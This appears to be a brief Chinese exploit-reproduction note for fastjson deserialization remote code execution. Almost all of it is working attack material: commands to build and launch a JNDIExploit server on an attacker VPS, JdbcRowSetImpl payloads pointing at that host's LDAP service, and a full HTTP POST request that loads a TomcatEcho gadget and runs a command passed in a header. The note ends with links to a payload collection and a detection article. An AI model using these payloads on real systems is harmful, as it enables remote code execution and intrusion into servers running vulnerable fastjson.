fastjson 漏洞利用 - 《漏洞复现》

# https://github.com/Jeromeyoung/JNDIExploit-1
# mvn clean package -DskipTests
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i vps地址

payload 请求

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://vps地址:1389/badClassName", "autoCommit":true}

POST / HTTP/1.1
Host: x.x.x.x
...
cmd: ls /tmp
...
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://vps地址:1389/Basic/TomcatEcho",
        "autoCommit":true
    }
}

fastjson 姿势技巧合集：https://github.com/safe6Sec/Fastjson
https://gv7.me/articles/2020/several-ways-to-detect-fastjson-through-dnslog/
https://github.com/alibaba/fastjson/issues/3077